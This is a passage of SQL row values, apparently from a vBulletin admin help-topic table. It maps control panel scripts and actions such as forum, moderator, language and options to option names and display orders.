(3685, 'faq', 'add,edit', 'deftext', 30, 1, 'vbulletin'),
(3686, 'faq', 'add,edit', 'displayorder', 40, 1, 'vbulletin'),
(3687, 'faq', 'add,edit', '1', 60, 1, 'vbulletin'),
(3688, 'faq', 'delete', '', 1, 1, 'vbulletin'),
(3689, 'faq', 'edit', '', 1, 1, 'vbulletin'),
(3690, 'faq', 'modify', '', 1, 1, 'vbulletin'),
(3691, 'forum', '', '', 1, 1, 'vbulletin'),
(3692, 'forum', 'add', '', 1, 1, 'vbulletin'),
(3693, 'forum', 'add,edit', 'title', 20, 1, 'vbulletin'),
(3694, 'forum', 'add,edit', 'description', 30, 1, 'vbulletin'),
(3695, 'forum', 'add,edit', 'link', 40, 1, 'vbulletin'),
(3696, 'forum', 'add,edit', 'displayorder', 50, 1, 'vbulletin'),
(3697, 'forum', 'add,edit', 'parentid', 60, 1, 'vbulletin'),
(3698, 'forum', 'add,edit', 'daysprune', 70, 1, 'vbulletin'),
(3699, 'forum', 'add,edit', 'defaultsortfield', 72, 1, 'vbulletin'),
(3700, 'forum', 'add,edit', 'defaultsortorder', 73, 1, 'vbulletin'),
(3701, 'forum', 'add,edit', 'showprivate', 75, 1, 'vbulletin'),
(3702, 'forum', 'add,edit', 'newpostemail', 80, 1, 'vbulletin'),
(3703, 'forum', 'add,edit', 'newthreademail', 90, 1, 'vbulletin'),
(3704, 'forum', 'add,edit', 'moderatenewpost', 100, 1, 'vbulletin'),
(3705, 'forum', 'add,edit', 'moderatenewthread', 105, 1, 'vbulletin'),
(3706, 'forum', 'add,edit', 'moderateattach', 110, 1, 'vbulletin'),
(3707, 'forum', 'add,edit', 'styleid', 120, 1, 'vbulletin'),
(3708, 'forum', 'add,edit', 'styleoverride', 130, 1, 'vbulletin'),
(3709, 'forum', 'add,edit', 'imageprefix', 140, 1, 'vbulletin'),
(3710, 'forum', 'add,edit', 'password', 150, 1, 'vbulletin'),
(3711, 'forum', 'add,edit', 'canhavepassword', 170, 1, 'vbulletin'),
(3712, 'forum', 'add,edit', 'cancontainthreads', 180, 1, 'vbulletin'),
(3713, 'forum', 'add,edit', 'active', 190, 1, 'vbulletin'),
(3714, 'forum', 'add,edit', 'allowposting', 200, 1, 'vbulletin'),
(3715, 'forum', 'add,edit', 'indexposts', 210, 1, 'vbulletin'),
(3716, 'forum', 'add,edit', 'allowhtml', 220, 1, 'vbulletin'),
(3717, 'forum', 'add,edit', 'allowbbcode', 230, 1, 'vbulletin'),
(3718, 'forum', 'add,edit', 'allowimages', 240, 1, 'vbulletin'),
(3719, 'forum', 'add,edit', 'allowsmilies', 250, 1, 'vbulletin'),
(3720, 'forum', 'add,edit', 'allowicons', 260, 1, 'vbulletin'),
(3721, 'forum', 'add,edit', 'allowratings', 270, 1, 'vbulletin'),
(3722, 'forum', 'add,edit', 'countposts', 280, 1, 'vbulletin'),
(3723, 'forum', 'add,edit', 'showonforumjump', 290, 1, 'vbulletin'),
(3724, 'forum', 'add,edit', 'prefixset', 300, 1, 'vbulletin'),
(3725, 'forum', 'add,edit', 'prefixrequired', 310, 1, 'vbulletin'),
(3726, 'forum', 'edit', '', 1, 1, 'vbulletin'),
(3727, 'forum', 'edit', 'applypwdtochild', 160, 1, 'vbulletin'),
(3728, 'forum', 'modify', '', 1, 1, 'vbulletin'),
(3729, 'forum', 'podcast', 'author', 1, 1, 'vbulletin'),
(3730, 'forum', 'podcast', 'categoryid', 1, 1, 'vbulletin'),
(3731, 'forum', 'podcast', 'enabled', 1, 1, 'vbulletin'),
(3732, 'forum', 'podcast', 'explicit', 1, 1, 'vbulletin'),
(3733, 'forum', 'podcast', 'image', 1, 1, 'vbulletin'),
(3734, 'forum', 'podcast', 'keywords', 1, 1, 'vbulletin'),
(3735, 'forum', 'podcast', 'owneremail', 1, 1, 'vbulletin'),
(3736, 'forum', 'podcast', 'ownername', 1, 1, 'vbulletin'),
(3737, 'forum', 'podcast', 'subtitle', 1, 1, 'vbulletin'),
(3738, 'forum', 'podcast', 'summary', 1, 1, 'vbulletin'),
(3739, 'forum', 'remove', '', 1, 1, 'vbulletin'),
(3740, 'forumpermission', '', '', 1, 1, 'vbulletin'),
(3741, 'forumpermission', 'duplicate', '', 1, 1, 'vbulletin'),
(3742, 'forumpermission', 'duplicate', 'ugid_from', 10, 1, 'vbulletin'),
(3743, 'forumpermission', 'duplicate', 'usergrouplist', 20, 1, 'vbulletin'),
(3744, 'forumpermission', 'duplicate', 'limitforumid', 30, 1, 'vbulletin'),
(3745, 'forumpermission', 'duplicate', 'overwritedupes_group', 40, 1, 'vbulletin'),
(3746, 'forumpermission', 'duplicate', 'overwriteinherited_group', 50, 1, 'vbulletin'),
(3747, 'forumpermission', 'duplicate', 'forumid_from', 60, 1, 'vbulletin'),
(3748, 'forumpermission', 'duplicate', 'forumlist', 70, 1, 'vbulletin'),
(3749, 'forumpermission', 'duplicate', 'overwritedupes_forum', 80, 1, 'vbulletin'),
(3750, 'forumpermission', 'duplicate', 'overwriteinherited_forum', 90, 1, 'vbulletin'),
(3751, 'forumpermission', 'edit', '', 1, 1, 'vbulletin'),
(3752, 'forumpermission', 'edit', 'canseethumbnails', 1, 1, 'vbulletin'),
(3753, 'forumpermission', 'edit', 'mode', 20, 1, 'vbulletin'),
(3754, 'forumpermission', 'edit,quickforum', 'canview', 30, 1, 'vbulletin'),
(3755, 'forumpermission', 'edit,quickforum', 'canviewthreads', 35, 1, 'vbulletin'),
(3756, 'forumpermission', 'edit,quickforum', 'canviewothers', 40, 1, 'vbulletin'),
(3757, 'forumpermission', 'edit,quickforum', 'canseedelnotice', 45, 1, 'vbulletin'),
(3758, 'forumpermission', 'edit,quickforum', 'cansearch', 50, 1, 'vbulletin'),
(3759, 'forumpermission', 'edit,quickforum', 'canemail', 60, 1, 'vbulletin'),
(3760, 'forumpermission', 'edit,quickforum', 'cangetattachment', 70, 1, 'vbulletin'),
(3761, 'forumpermission', 'edit,quickforum', 'canpostnew', 80, 1, 'vbulletin'),
(3762, 'forumpermission', 'edit,quickforum', 'canreplyown', 90, 1, 'vbulletin'),
(3763, 'forumpermission', 'edit,quickforum', 'canreplyothers', 100, 1, 'vbulletin'),
(3764, 'forumpermission', 'edit,quickforum', 'followforummoderation', 110, 1, 'vbulletin'),
(3765, 'forumpermission', 'edit,quickforum', 'canpostattachment', 120, 1, 'vbulletin'),
(3766, 'forumpermission', 'edit,quickforum', 'cantagown', 120, 1, 'vbulletin'),
(3767, 'forumpermission', 'edit,quickforum', 'cantagothers', 130, 1, 'vbulletin'),
(3768, 'forumpermission', 'edit,quickforum', 'candeletetagown', 140, 1, 'vbulletin'),
(3769, 'forumpermission', 'edit,quickforum', 'canthreadrate', 140, 1, 'vbulletin'),
(3770, 'forumpermission', 'edit,quickforum', 'caneditpost', 150, 1, 'vbulletin'),
(3771, 'forumpermission', 'edit,quickforum', 'candeletepost', 160, 1, 'vbulletin'),
(3772, 'forumpermission', 'edit,quickforum', 'canmove', 170, 1, 'vbulletin'),
(3773, 'forumpermission', 'edit,quickforum', 'canopenclose', 180, 1, 'vbulletin'),
(3774, 'forumpermission', 'edit,quickforum', 'candeletethread', 190, 1, 'vbulletin'),
(3775, 'forumpermission', 'edit,quickforum', 'canpostpoll', 200, 1, 'vbulletin'),
(3776, 'forumpermission', 'edit,quickforum', 'canvote', 220, 1, 'vbulletin'),
(3777, 'forumpermission', 'modify', '', 1, 1, 'vbulletin'),
(3778, 'forumpermission', 'quickedit', '', 1, 1, 'vbulletin'),
(3779, 'forumpermission', 'quickeditor', '', 1, 1, 'vbulletin'),
(3780, 'forumpermission', 'quickforum', '', 1, 1, 'vbulletin'),
(3781, 'forumpermission', 'quickforum', 'forumid', 10, 1, 'vbulletin'),
(3782, 'forumpermission', 'quickforum', 'usergrouplist', 20, 1, 'vbulletin'),
(3783, 'help', 'edit', 'action', 1, 1, 'vbulletin'),
(3784, 'help', 'edit', 'displayorder', 1, 1, 'vbulletin'),
(3785, 'help', 'edit', 'optionname', 1, 1, 'vbulletin'),
(3786, 'help', 'edit', 'product', 1, 1, 'vbulletin'),
(3787, 'help', 'edit', 'script', 1, 1, 'vbulletin'),
(3788, 'help', 'edit', 'text', 1, 1, 'vbulletin'),
(3789, 'help', 'edit', 'title', 1, 1, 'vbulletin'),
(3790, 'help', 'edit', 'volatile', 1, 1, 'vbulletin'),
(3791, 'image', '', '', 1, 1, 'vbulletin'),
(3792, 'image', 'add', '', 1, 1, 'vbulletin'),
(3793, 'image', 'add', 'imagespath', 70, 1, 'vbulletin'),
(3794, 'image', 'add', 'perpage', 80, 1, 'vbulletin'),
(3795, 'image', 'add,edit,upload', 'title', 20, 1, 'vbulletin'),
(3796, 'image', 'add,edit,upload', 'minimumposts', 30, 1, 'vbulletin'),
(3797, 'image', 'add,edit,upload', 'smilietext', 30, 1, 'vbulletin'),
(3798, 'image', 'add,edit,upload', 'path', 40, 1, 'vbulletin'),
(3799, 'image', 'add,edit,upload', 'imagecategoryid', 50, 1, 'vbulletin'),
(3800, 'image', 'add,edit,upload', 'displayorder', 60, 1, 'vbulletin'),
(3801, 'image', 'addcategory', '', 1, 1, 'vbulletin'),
(3802, 'image', 'addcategory,editcategory', 'title', 20, 1, 'vbulletin'),
(3803, 'image', 'addcategory,editcategory', 'displayorder', 30, 1, 'vbulletin'),
(3804, 'image', 'edit', '', 1, 1, 'vbulletin'),
(3805, 'image', 'editcategory', '', 1, 1, 'vbulletin'),
(3806, 'image', 'editpermissions', '', 1, 1, 'vbulletin'),
(3807, 'image', 'modify', '', 1, 1, 'vbulletin'),
(3808, 'image', 'remove', '', 1, 1, 'vbulletin'),
(3809, 'image', 'removecategory', '', 1, 1, 'vbulletin'),
(3810, 'image', 'upload', '', 1, 1, 'vbulletin'),
(3811, 'image', 'upload', 'imagespath', 1, 1, 'vbulletin'),
(3812, 'image', 'upload', 'upload', 1, 1, 'vbulletin'),
(3813, 'image', 'upload', 'imagefile', 20, 1, 'vbulletin'),
(3814, 'image', 'viewimages', '', 1, 1, 'vbulletin'),
(3815, 'index', 'home', '', 1, 1, 'vbulletin'),
(3816, 'language', '', '', 1, 1, 'vbulletin'),
(3817, 'language', 'add', '', 1, 1, 'vbulletin'),
(3818, 'language', 'add,edit_settings', 'title', 20, 1, 'vbulletin'),
(3819, 'language', 'add,edit_settings', 'userselect', 30, 1, 'vbulletin'),
(3820, 'language', 'add,edit_settings', 'direction', 50, 1, 'vbulletin'),
(3821, 'language', 'add,edit_settings', 'languagecode', 60, 1, 'vbulletin'),
(3822, 'language', 'add,edit_settings', 'charset', 70, 1, 'vbulletin'),
(3823, 'language', 'add,edit_settings', 'imagesoverride', 80, 1, 'vbulletin'),
(3824, 'language', 'add,edit_settings', 'locale', 90, 1, 'vbulletin'),
(3825, 'language', 'add,edit_settings', 'dateoverride', 100, 1, 'vbulletin'),
(3826, 'language', 'add,edit_settings', 'timeoverride', 110, 1, 'vbulletin'),
(3827, 'language', 'add,edit_settings', 'registereddateoverride', 120, 1, 'vbulletin'),
(3828, 'language', 'add,edit_settings', 'calformat1override', 130, 1, 'vbulletin'),
(3829, 'language', 'add,edit_settings', 'calformat2override', 140, 1, 'vbulletin'),
(3830, 'language', 'add,edit_settings', 'logdateoverride', 150, 1, 'vbulletin'),
(3831, 'language', 'add,edit_settings', 'decimalsep', 160, 1, 'vbulletin'),
(3832, 'language', 'add,edit_settings', 'thousandsep', 170, 1, 'vbulletin'),
(3833, 'language', 'add,edit_settings', 'dirmark', 180, 1, 'vbulletin'),
(3834, 'language', 'delete', '', 1, 1, 'vbulletin'),
(3835, 'language', 'edit', '', 1, 1, 'vbulletin'),
(3836, 'language', 'edit_settings', '', 1, 1, 'vbulletin'),
(3837, 'language', 'edit_settings', 'isdefault', 40, 1, 'vbulletin'),
(3838, 'language', 'files', '', 1, 1, 'vbulletin'),
(3839, 'language', 'files', 'languageid', 10, 1, 'vbulletin'),
(3840, 'language', 'files', 'product', 15, 1, 'vbulletin'),
(3841, 'language', 'files', 'filename', 20, 1, 'vbulletin'),
(3842, 'language', 'files', 'just_phrases', 30, 1, 'vbulletin'),
(3843, 'language', 'files', 'languagefile', 40, 1, 'vbulletin'),
(3844, 'language', 'files', 'serverfile', 50, 1, 'vbulletin'),
(3845, 'language', 'files', 'olanguageid', 60, 1, 'vbulletin'),
(3846, 'language', 'files', 'title', 70, 1, 'vbulletin'),
(3847, 'language', 'files', 'anyversion', 80, 1, 'vbulletin'),
(3848, 'language', 'modify', '', 1, 1, 'vbulletin'),
(3849, 'language', 'rebuild', '', 1, 1, 'vbulletin'),
(3850, 'misc', '', '', 1, 1, 'vbulletin'),
(3851, 'misc', 'chooser', '', 1, 1, 'vbulletin'),
(3852, 'misc', 'chooser', 'quality', 1, 1, 'vbulletin'),
(3853, 'misc', 'chooser', 'perpage', 10, 1, 'vbulletin'),
(3854, 'misc', 'chooser', 'startat', 20, 1, 'vbulletin'),
(3855, 'misc', 'chooser', 'doprocess', 30, 1, 'vbulletin'),
(3856, 'misc', 'chooser', 'autoredirect', 40, 1, 'vbulletin'),
(3857, 'misc', 'chooser', 'install', 50, 1, 'vbulletin'),
(3858, 'misc', 'chooser', 'renumber', 60, 1, 'vbulletin'),
(3859, 'misc', 'chooser', 'reputation_base', 70, 1, 'vbulletin'),
(3860, 'moderate', '', '', 1, 1, 'vbulletin'),
(3861, 'moderate', 'attachments', '', 1, 1, 'vbulletin'),
(3862, 'moderate', 'attachments', 'attachaction', 10, 1, 'vbulletin'),
(3863, 'moderate', 'events', '', 1, 1, 'vbulletin'),
(3864, 'moderate', 'events', 'eventsubject', 10, 1, 'vbulletin'),
(3865, 'moderate', 'events', 'eventtext', 20, 1, 'vbulletin'),
(3866, 'moderate', 'events', 'eventaction', 30, 1, 'vbulletin'),
(3867, 'moderate', 'posts', '', 1, 1, 'vbulletin'),
(3868, 'moderate', 'posts', 'threadtitle', 10, 1, 'vbulletin'),
(3869, 'moderate', 'posts', 'threadpagetext', 20, 1, 'vbulletin'),
(3870, 'moderate', 'posts', 'threadnotes', 30, 1, 'vbulletin'),
(3871, 'moderate', 'posts', 'threadaction', 40, 1, 'vbulletin'),
(3872, 'moderate', 'posts', 'posttitle', 50, 1, 'vbulletin'),
(3873, 'moderate', 'posts', 'postpagetext', 60, 1, 'vbulletin'),
(3874, 'moderate', 'posts', 'postaction', 70, 1, 'vbulletin'),
(3875, 'moderator', '', '', 1, 1, 'vbulletin'),
(3876, 'moderator', 'add', '', 1, 1, 'vbulletin'),
(3877, 'moderator', 'add', 'usergroupid', 30, 1, 'vbulletin'),
(3878, 'moderator', 'add', 'membergroupids', 40, 1, 'vbulletin'),
(3879, 'moderator', 'add,edit', 'forumid', 10, 1, 'vbulletin'),
(3880, 'moderator', 'add,edit', 'modusername', 20, 1, 'vbulletin'),
(3881, 'moderator', 'add,edit,editglobal', 'candeletealbumpicture', 1, 1, 'vbulletin'),
(3882, 'moderator', 'add,edit,editglobal', 'candeletepicturecomments', 1, 1, 'vbulletin'),
(3883, 'moderator', 'add,edit,editglobal', 'caneditpicturecomments', 1, 1, 'vbulletin'),
(3884, 'moderator', 'add,edit,editglobal', 'canmoderatepicturecomments', 1, 1, 'vbulletin'),
(3885, 'moderator', 'add,edit,editglobal', 'canmoderatepictures', 1, 1, 'vbulletin'),
(3886, 'moderator', 'add,edit,editglobal', 'canremovepicturecomments', 1, 1, 'vbulletin'),
(3887, 'moderator', 'add,edit,editglobal', 'caneditposts', 50, 1, 'vbulletin'),
(3888, 'moderator', 'add,edit,editglobal', 'candeleteposts', 60, 1, 'vbulletin'),
(3889, 'moderator', 'add,edit,editglobal', 'canremoveposts', 70, 1, 'vbulletin'),
(3890, 'moderator', 'add,edit,editglobal', 'canopenclose', 80, 1, 'vbulletin'),
(3891, 'moderator', 'add,edit,editglobal', 'caneditthreads', 90, 1, 'vbulletin'),
(3892, 'moderator', 'add,edit,editglobal', 'canmanagethreads', 100, 1, 'vbulletin'),
(3893, 'moderator', 'add,edit,editglobal', 'caneditpoll', 110, 1, 'vbulletin'),
(3894, 'moderator', 'add,edit,editglobal', 'canannounce', 120, 1, 'vbulletin'),
(3895, 'moderator', 'add,edit,editglobal', 'canmoderateposts', 130, 1, 'vbulletin'),
(3896, 'moderator', 'add,edit,editglobal', 'canmoderateattachments', 140, 1, 'vbulletin'),
(3897, 'moderator', 'add,edit,editglobal', 'canmassmove', 150, 1, 'vbulletin'),
(3898, 'moderator', 'add,edit,editglobal', 'canmassprune', 160, 1, 'vbulletin'),
(3899, 'moderator', 'add,edit,editglobal', 'cansetpassword', 170, 1, 'vbulletin'),
(3900, 'moderator', 'add,edit,editglobal', 'canviewips', 180, 1, 'vbulletin'),
(3901, 'moderator', 'add,edit,editglobal', 'canviewprofile', 190, 1, 'vbulletin'),
(3902, 'moderator', 'add,edit,editglobal', 'canbanusers', 200, 1, 'vbulletin'),
(3903, 'moderator', 'add,edit,editglobal', 'canunbanusers', 210, 1, 'vbulletin'),
(3904, 'moderator', 'add,edit,editglobal', 'caneditsigs', 220, 1, 'vbulletin'),
(3905, 'moderator', 'add,edit,editglobal', 'caneditavatar', 230, 1, 'vbulletin'),
(3906, 'moderator', 'add,edit,editglobal', 'caneditprofilepic', 240, 1, 'vbulletin'),
(3907, 'moderator', 'add,edit,editglobal', 'caneditreputation', 250, 1, 'vbulletin'),
(3908, 'moderator', 'add,edit,editglobal', 'newthreademail', 260, 1, 'vbulletin'),
(3909, 'moderator', 'add,edit,editglobal', 'newpostemail', 270, 1, 'vbulletin'),
(3910, 'moderator', 'add,edit,editglobal', 'caneditvisitormessages', 300, 1, 'vbulletin'),
(3911, 'moderator', 'add,edit,editglobal', 'candeletevisitormessages', 310, 1, 'vbulletin'),
(3912, 'moderator', 'add,edit,editglobal', 'canremovevisitormessages', 320, 1, 'vbulletin'),
(3913, 'moderator', 'add,edit,editglobal', 'canmoderatevisitormessages', 330, 1, 'vbulletin'),
(3914, 'moderator', 'add,edit,editglobal', 'caneditsocialgroups', 350, 1, 'vbulletin'),
(3915, 'moderator', 'add,edit,editglobal', 'candeletesocialgroups', 360, 1, 'vbulletin'),
(3916, 'moderator', 'add,edit,editglobal', 'caneditgroupmessages', 370, 1, 'vbulletin'),
(3917, 'moderator', 'add,edit,editglobal', 'candeletegroupmessages', 380, 1, 'vbulletin'),
(3918, 'moderator', 'add,edit,editglobal', 'canremovegroupmessages', 390, 1, 'vbulletin'),
(3919, 'moderator', 'add,edit,editglobal', 'canmoderategroupmessages', 400, 1, 'vbulletin'),
(3920, 'moderator', 'add,edit,editglobal', 'caneditalbumpicture', 450, 1, 'vbulletin'),
(3921, 'moderator', 'edit', '', 1, 1, 'vbulletin'),
(3922, 'moderator', 'edit', 'candeletediscussions', 1, 1, 'vbulletin'),
(3923, 'moderator', 'edit', 'caneditdiscussions', 1, 1, 'vbulletin'),
(3924, 'moderator', 'edit', 'canmoderatediscussions', 1, 1, 'vbulletin'),
(3925, 'moderator', 'edit', 'canremovediscussions', 1, 1, 'vbulletin'),
(3926, 'moderator', 'editglobal', 'candeletediscussions', 1, 1, 'vbulletin'),
(3927, 'moderator', 'editglobal', 'caneditdiscussions', 1, 1, 'vbulletin'),
(3928, 'moderator', 'editglobal', 'canmoderatediscussions', 1, 1, 'vbulletin'),
(3929, 'moderator', 'editglobal', 'canremovediscussions', 1, 1, 'vbulletin'),
(3930, 'moderator', 'editglobal', 'cantransfersocialgroups', 1, 1, 'vbulletin'),
(3931, 'moderator', 'remove', '', 1, 1, 'vbulletin'),
(3932, 'moderator', 'removeall', '', 1, 1, 'vbulletin'),
(3933, 'moderator', 'showlist', '', 1, 1, 'vbulletin'),
(3934, 'modlog', '', '', 1, 1, 'vbulletin'),
(3935, 'modlog', 'choose', '', 1, 1, 'vbulletin'),
(3936, 'modlog', 'choose', 'perpage', 10, 1, 'vbulletin'),
(3937, 'modlog', 'choose', 'userid', 20, 1, 'vbulletin'),
(3938, 'modlog', 'choose', 'orderby', 30, 1, 'vbulletin'),
(3939, 'modlog', 'choose', 'daysprune', 40, 1, 'vbulletin'),
(3940, 'modlog', 'prunelog', '', 1, 1, 'vbulletin'),
(3941, 'modlog', 'view', '', 1, 1, 'vbulletin'),
(3942, 'notice', 'add,edit', 'title', 1, 1, 'vbulletin'),
(3943, 'notice', 'add,edit', 'html', 4, 1, 'vbulletin'),
(3944, 'notice', 'add,edit', 'displayorder', 6, 1, 'vbulletin'),
(3945, 'notice', 'add,edit', 'active', 8, 1, 'vbulletin'),
(3946, 'notice', 'add,edit', 'persistent', 10, 1, 'vbulletin'),
(3947, 'notice', 'add,edit', 'criteria', 20, 1, 'vbulletin'),
(3948, 'notice', 'modify', 'tableheader', 1, 1, 'vbulletin'),
(3949, 'options', '', '', 1, 1, 'vbulletin'),
(3950, 'options', 'options', '', 1, 1, 'vbulletin'),
(3951, 'options', 'options', 'albums_perpage', 1, 1, 'vbulletin'),
(3952, 'options', 'options', 'albums_pictures_moderation', 1, 1, 'vbulletin'),
(3953, 'options', 'options', 'album_captionpreviewlen', 1, 1, 'vbulletin'),
(3954, 'options', 'options', 'album_maxpicsperalbum', 1, 1, 'vbulletin'),
(3955, 'options', 'options', 'album_pictures_perpage', 1, 1, 'vbulletin'),
(3956, 'options', 'options', 'album_recentalbumdays', 1, 1, 'vbulletin'),
(3957, 'options', 'options', 'album_thumbsize', 1, 1, 'vbulletin'),
(3958, 'options', 'options', 'album_uploadamount', 1, 1, 'vbulletin'),
(3959, 'options', 'options', 'attachresize', 1, 1, 'vbulletin'),
(3960, 'options', 'options', 'bounceemail', 1, 1, 'vbulletin'),
(3961, 'options', 'options', 'checkcoppa', 1, 1, 'vbulletin'),
(3962, 'options', 'options', 'errorlogemail', 1, 1, 'vbulletin'),
(3963, 'options', 'options', 'externalcache', 1, 1, 'vbulletin'),
(3964, 'options', 'options', 'externalcount', 1, 1, 'vbulletin'),
(3965, 'options', 'options', 'gm_maxperpage', 1, 1, 'vbulletin'),
(3966, 'options', 'options', 'gm_perpage', 1, 1, 'vbulletin'),
(3967, 'options', 'options', 'hvcheck', 1, 1, 'vbulletin'),
(3968, 'options', 'options', 'ie8render7', 1, 1, 'vbulletin'),
(3969, 'options', 'options', 'ipcheck', 1, 1, 'vbulletin'),
(3970, 'options', 'options', 'paymentemail', 1, 1, 'vbulletin'),
(3971, 'options', 'options', 'pc_allowed_bbcode', 1, 1, 'vbulletin'),
(3972, 'options', 'options', 'pc_enabled', 1, 1, 'vbulletin'),
(3973, 'options', 'options', 'pc_maxperpage', 1, 1, 'vbulletin'),
(3974, 'options', 'options', 'pc_moderation', 1, 1, 'vbulletin'),
(3975, 'options', 'options', 'pc_perpage', 1, 1, 'vbulletin'),
(3976, 'options', 'options', 'pmthrottleperiod', 1, 1, 'vbulletin'),
(3977, 'options', 'options', 'postedithistory', 1, 1, 'vbulletin'),
(3978, 'options', 'options', 'postimagecheck', 1, 1, 'vbulletin'),
(3979, 'options', 'options', 'profileprivacy', 1, 1, 'vbulletin'),
(3980, 'options', 'options', 'profile_album_amount', 1, 1, 'vbulletin'),
(3981, 'options', 'options', 'remoteyui', 1, 1, 'vbulletin'),
(3982, 'options', 'options', 'rpemail', 1, 1, 'vbulletin'),
(3983, 'options', 'options', 'rpforumid', 1, 1, 'vbulletin'),
(3984, 'options', 'options', 'rpuserid', 1, 1, 'vbulletin'),
(3985, 'options', 'options', 'sgd_maxperpage', 1, 1, 'vbulletin'),
(3986, 'options', 'options', 'sgd_perpage', 1, 1, 'vbulletin'),
(3987, 'options', 'options', 'sg_allowed_bbcode', 1, 1, 'vbulletin'),
(3988, 'options', 'options', 'sg_allow_delete_empty_group', 1, 1, 'vbulletin'),
(3989, 'options', 'options', 'sg_allow_join_to_view', 1, 1, 'vbulletin'),
(3990, 'options', 'options', 'sg_allow_owner_mod_queue', 1, 1, 'vbulletin'),
(3991, 'options', 'options', 'sg_category_cloud_size', 1, 1, 'vbulletin'),
(3992, 'options', 'options', 'sg_enablesocialgroupicons', 1, 1, 'vbulletin'),
(3993, 'options', 'options', 'sg_enable_owner_only_discussions', 1, 1, 'vbulletin'),
(3994, 'options', 'options', 'sg_maxperpage', 1, 1, 'vbulletin'),
(3995, 'options', 'options', 'sg_name_maxchars', 1, 1, 'vbulletin'),
(3996, 'options', 'options', 'sg_newgroups_count', 1, 1, 'vbulletin'),
(3997, 'options', 'options', 'sg_perpage', 1, 1, 'vbulletin'),
(3998, 'options', 'options', 'skypeweb_gfx', 1, 1, 'vbulletin'),
(3999, 'options', 'options', 'socialbookmarks', 1, 1, 'vbulletin'),
(4000, 'options', 'options', 'socnet', 1, 1, 'vbulletin'),
(4001, 'options', 'options', 'tagbadwords', 1, 1, 'vbulletin'),
(4002, 'options', 'options', 'tagcloud_cachetime', 1, 1, 'vbulletin'),
(4003, 'options', 'options', 'tagcloud_levels', 1, 1, 'vbulletin'),
(4004, 'options', 'options', 'tagcloud_searchcloud', 1, 1, 'vbulletin'),
(4005, 'options', 'options', 'tagcloud_searchhistory', 1, 1, 'vbulletin'),
(4006, 'options', 'options', 'tagcloud_tags', 1, 1, 'vbulletin'),
(4007, 'options', 'options', 'tagcloud_usagehistory', 1, 1, 'vbulletin'),
(4008, 'options', 'options', 'tagcloud_usergroup', 1, 1, 'vbulletin'),
(4009, 'options', 'options', 'tagdelimiter', 1, 1, 'vbulletin'),
(4010, 'options', 'options', 'taggoodwords', 1, 1, 'vbulletin'),
(4011, 'options', 'options', 'tagminlen', 1, 1, 'vbulletin'),
(4012, 'options', 'options', 'thumbcolor', 1, 1, 'vbulletin'),
(4013, 'options', 'options', 'tosurl', 1, 1, 'vbulletin'),
(4014, 'options', 'options', 'uiforumid', 1, 1, 'vbulletin'),
(4015, 'options', 'options', 'uimessage', 1, 1, 'vbulletin'),
(4016, 'options', 'options', 'usercss_allowed_fonts', 1, 1, 'vbulletin'),
(4017, 'options', 'options', 'usercss_allowed_padding', 1, 1, 'vbulletin'),
(4018, 'options', 'options', 'vm_allowed_bbcode', 1, 1, 'vbulletin'),
(4019, 'options', 'options', 'welcomepm', 1, 1, 'vbulletin'),
(4020, 'options', 'options', 'rsspodcast', 1, 1, 'vbulletin'),
(4021, 'options', 'options', 'socnet_groups_msg_enabled', 10, 1, 'vbulletin'),
(4022, 'options', 'options', 'vb_antispam_key', 10, 1, 'vbulletin'),
(4023, 'options', 'options', 'bbactive', 20, 1, 'vbulletin'),
(4024, 'options', 'options', 'socnet_groups_albums_enabled', 20, 1, 'vbulletin'),
(4025, 'options', 'options', 'vb_antispam_posts', 20, 1, 'vbulletin'),
(4026, 'options', 'options', 'bbclosedreason', 30, 1, 'vbulletin'),
(4027, 'options', 'options', 'bbtitle', 40, 1, 'vbulletin'),
(4028, 'options', 'options', 'bburl', 50, 1, 'vbulletin'),
(4029, 'options', 'options', 'hometitle', 60, 1, 'vbulletin'),
(4030, 'options', 'options', 'homeurl', 70, 1, 'vbulletin'),
(4031, 'options', 'options', 'contactuslink', 80, 1, 'vbulletin'),
(4032, 'options', 'options', 'contactustype', 85, 1, 'vbulletin'),
(4033, 'options', 'options', 'contactusoptions', 90, 1, 'vbulletin'),
(4034, 'options', 'options', 'lightboxenabled', 100, 1, 'vbulletin'),
(4035, 'options', 'options', 'webmasteremail', 100, 1, 'vbulletin'),
(4036, 'options', 'options', 'privacyurl', 110, 1, 'vbulletin'),
(4037, 'options', 'options', 'copyrighttext', 120, 1, 'vbulletin'),
(4038, 'options', 'options', 'companyname', 130, 1, 'vbulletin'),
(4039, 'options', 'options', 'faxnumber', 140, 1, 'vbulletin'),
(4040, 'options', 'options', 'address', 160, 1, 'vbulletin'),
(4041, 'options', 'options', 'keywords', 170, 1, 'vbulletin'),
(4042, 'options', 'options', 'description', 180, 1, 'vbulletin'),
(4043, 'options', 'options', 'useforumjump', 190, 1, 'vbulletin'),
(4044, 'options', 'options', 'pagenavpages', 200, 1, 'vbulletin'),
(4045, 'options', 'options', 'pagenavs', 205, 1, 'vbulletin'),
(4046, 'options', 'options', 'enableaccess', 210, 1, 'vbulletin'),
(4047, 'options', 'options', 'showimicons', 220, 1, 'vbulletin'),
(4048, 'options', 'options', 'addtemplatename', 230, 1, 'vbulletin'),
(4049, 'options', 'options', 'usestrikesystem', 235, 1, 'vbulletin'),
(4050, 'options', 'options', 'forumleaders', 236, 1, 'vbulletin'),
(4051, 'options', 'options', 'allowedreferrers', 237, 1, 'vbulletin'),
(4052, 'options', 'options', 'threadmarking', 238, 1, 'vbulletin'),
(4053, 'options', 'options', 'disable_ajax', 239, 1, 'vbulletin'),
(4054, 'options', 'options', 'enable_inlinemod_auth', 239, 1, 'vbulletin'),
(4055, 'options', 'options', 'markinglimit', 239, 1, 'vbulletin'),
(4056, 'options', 'options', 'threadtagging', 240, 1, 'vbulletin'),
(4057, 'options', 'options', 'yestoday', 240, 1, 'vbulletin'),
(4058, 'options', 'options', 'tagmaxlen', 241, 1, 'vbulletin'),
(4059, 'options', 'options', 'tagmaxstarter', 242, 1, 'vbulletin'),
(4060, 'options', 'options', 'tagmaxthread', 242, 1, 'vbulletin'),
(4061, 'options', 'options', 'tagmaxuser', 244, 1, 'vbulletin'),
(4062, 'options', 'options', 'tagforcelower', 245, 1, 'vbulletin'),
(4063, 'options', 'options', 'timeoffset', 250, 1, 'vbulletin'),
(4064, 'options', 'options', 'dstonoff', 260, 1, 'vbulletin'),
(4065, 'options', 'options', 'dateformat', 270, 1, 'vbulletin'),
(4066, 'options', 'options', 'timeformat', 280, 1, 'vbulletin'),
(4067, 'options', 'options', 'registereddateformat', 290, 1, 'vbulletin'),
(4068, 'options', 'options', 'calformat1', 300, 1, 'vbulletin'),
